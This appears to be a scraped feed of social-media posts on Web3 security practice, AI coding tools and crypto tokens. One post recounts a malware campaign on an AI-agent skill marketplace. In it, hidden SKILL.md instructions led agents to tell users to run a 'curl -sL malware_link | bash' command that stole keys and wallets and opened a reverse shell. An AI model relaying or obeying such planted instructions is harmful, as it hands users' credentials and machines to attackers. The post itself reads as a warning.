Avi

Many crypto startups claim to be "security first," but the reality is often quite different. It is common to find projects with hundreds of millions in TVL that do not have a dedicated head of security or even a security team. Often, security is just an engineer doing "double duty," which is impossible to maintain given how busy engineers are. Security is not the default state. You must be intentional about it because it does not happen on its own. Without an explicit effort to understand OpSec and best practices, a project is simply a target waiting to happen. Security is a difficult sell because its primary benefit is that nothing bad happens. The true ROI becomes clear when you see the consequences of accumulated "crap" like bug bounties, phishing emails, and engineering slowdowns caused by constant bug triaging. We are building financial infrastructure where trust is the ultimate differentiator. While the "crown jewels" in Web2 are data, the crown jewels in Web3 are money. Because of this, security shouldn't just be viewed as a cost ; it should be a way to build the hype and thought leadership that leadership teams crave. When a protocol is hacked, it isn't just VC money that is lost; it is the savings of regular people…moms, dads, and grandparents… who use crypto because they may not have access to traditional banking. This makes the lack of dedicated security teams in protocols holding massive TVL even more critical. In Web3, incident response speed is far more vital than in Web2 because transactions are immutable and funds can vanish instantly. Startups should have incident response plans and retainers in place before a hack occurs, rather than trying to find help while their funds are being drained. A dedicated security team doesn't just wait for alerts; they hunt for threats. This includes monitoring "breadcrumbs," such as contracts funded by Tornado Cash or suspicious forum inquiries, to stop an attack before it happens. The "attacker’s dilemma" .. where the attacker only needs to set off one alarm for the gig to be up .. only works if someone is actually watching the monitors. To any founder holding other people's money: go hire a security person. Security is not as difficult or expensive as people think, and there are many experts willing to help. Ultimately, a head of security can be a growth lever that bolsters TVL and generates revenue by making the protocol a trusted place for assets. The bottom line: In this industry, security isn't just a cost center…it's a necessity. The real cost center is getting compromised, as that is company-ending.

RIP onchain gaming 😭😭😭

Two accounts you never want to see in your replies

Coding an app is the new starting a podcast.

We're introducing Codex Security. An application security agent that helps you secure your codebase by finding vulnerabilities, validating them, and proposing fixes you can review and patch. Now, teams can focus on the vulnerabilities that matter and ship code faster. openai.com/index/codex-se…

We found the same Fiat-Shamir bug in six independent zkVMs. The result: an attacker can bypass the cryptography entirely and prove mathematically impossible statements (like minting $1M out of thin air). Full breakdown ↓

GenZ daily routine: - Wake up - Stare at 6.7 inch screen - Work on a 16 inch screen - Relax with a 55 inch screen - Stare at 6.7 inch screen - Sleep Repeat

a company dies once the funny people leave

Dune MCP is live 🔌 Plug Dune directly into @claudeai, @ChatGPTapp, @cursor_ai, and more. Search tables. Write queries. Build charts. Check Usage. All from a single prompt. 💻 Your AI just became a Dune power user.

Reverse engineering the iPhone’s Home button press API youtu.be/OMfZzLbUm6U?si…

the #1 most downloaded skill on OpenClaw marketplace was MALWARE it stole your SSH keys, crypto wallets, browser cookies, and opened a reverse shell to the attackers server 1,184 malicious skills found, one attacker uploaded 677 packages ALONE OpenClaw has a skill marketplace called ClawHub where anyone can upload plugins you install a skill, your AI agent gets new powers, this sounds great the problem? ClawHub let ANYONE publish with just a 1 week old github account attackers uploaded skills disguised as crypto trading bots, youtube summarizers, wallet trackers. the documentation looked PROFESSIONAL but hidden in the SKILL.md file were instructions that tricked the AI into telling you to run a command > to enable this feature please run: curl -sL malware_link | bash that one command installed Atomic Stealer on macOS it grabbed your browser passwords, SSH keys, Telegram sessions, crypto wallets, keychains, and every API key in your .env files on other systems it opened a REVERSE SHELL giving the attacker full remote control of your machine Cisco scanned the #1 ranked skill on ClawHub. it was called What Would Elon Do and had 9 security vulnerabilities, 2 CRITICAL. it silently exfiltrated data AND used prompt injection to bypass safety guidelines, downloaded THOUSANDS of times. the ranking was gamed to reach #1 this is npm supply chain attacks all over again except the package can THINK and has root access to your life

chuckles!!

"Claude wrote vulnerable code" raised my eyebrows because it doesn't feel right 🤨 So I investigated it with Claude and asked what is the wrong with this PR. It indeed looks like an AI agent made a mistake here. However, the same mistake could have been made by a human. The prompt: "Inspect this pull request and changes and check what oracle address is incorrect and why, causing the ETH rate to be wrong" Claude also gives a good post-mortem analysis; see the screenshots. Also this was not a code vulnerability error, but a configuration error, just to be accurate. Regardless of whether the code is written by an AI or by a human, these kinds of errors are caught in an automated integration test suite. You can ask Claude to generate the test cases regardless of whether you write the code yourself or just autocomplete it. In this case, tests existed, but there was no test case for price sanity, not in the tests, not in the production itself (which I would also recommend: have DAO controlled safe price range). As a human deployer, you will also perform manual checks when deploying changes like this, as part of the DAO process or similar.

So @MoonwellDeFi accrued $2M bad debt due to a exploit due to oracle misconfiguration The commit was co-authored by Claude Is this the first case of a vibecoded defi protocol being exploited?

January 2026: $397M stolen in a single month. $311M in phishing alone. Most of it preventable. Here's the DeFi Launch Security Checklist ✅every team needs before going live. Save this. 🧵👇

@FabianoSolana Spot on Facts

The truth about $JUP JUP started to dip in early 2025, right when most of the unlocks began. Obviously, the entire market took a big hit around that time as well. SOL later recovered to $245 in Q3 (about a 2.5x from the lows), but JUP couldn’t follow. That’s when the Mercurial unlocks kicked in too. Along with the Libra FUD the token couldn't recover so far... People ask why nothing about $JUP was announced at Catlumpurr ?! In reality, there was a bullish announcement with the ParaFi investment but beyond that, it didn’t make much sense to aggressively push the token while unlocks are fully underway. I don’t know the exact situation with team tokens, but Mercurial stakeholders are obviously dumping their allocations. That’s also why buybacks are necessary to eventually neutralize the sell pressure. You might think that’s dumb — but it’s not... By buying back the token, they accumulate a huge chunk of the supply (see pump fun) That makes it much easier to pump the token one day Not anytime soon tho as the unlocks are still ongoing for another year. Still, I strongly believe that $JUP will go above $1 again. There's no bigger company on Solana than Jupiter... Ps. Not judging anyone dumping tokens (99% would probably do that)

Hey @grok which part of the brain makes someone a coder or a vibe coder...

Documentary: non-technical founder discovers Claude Code

Server for LLMs to reverse engineer applications github.com/LaurieWired/Gh…

💯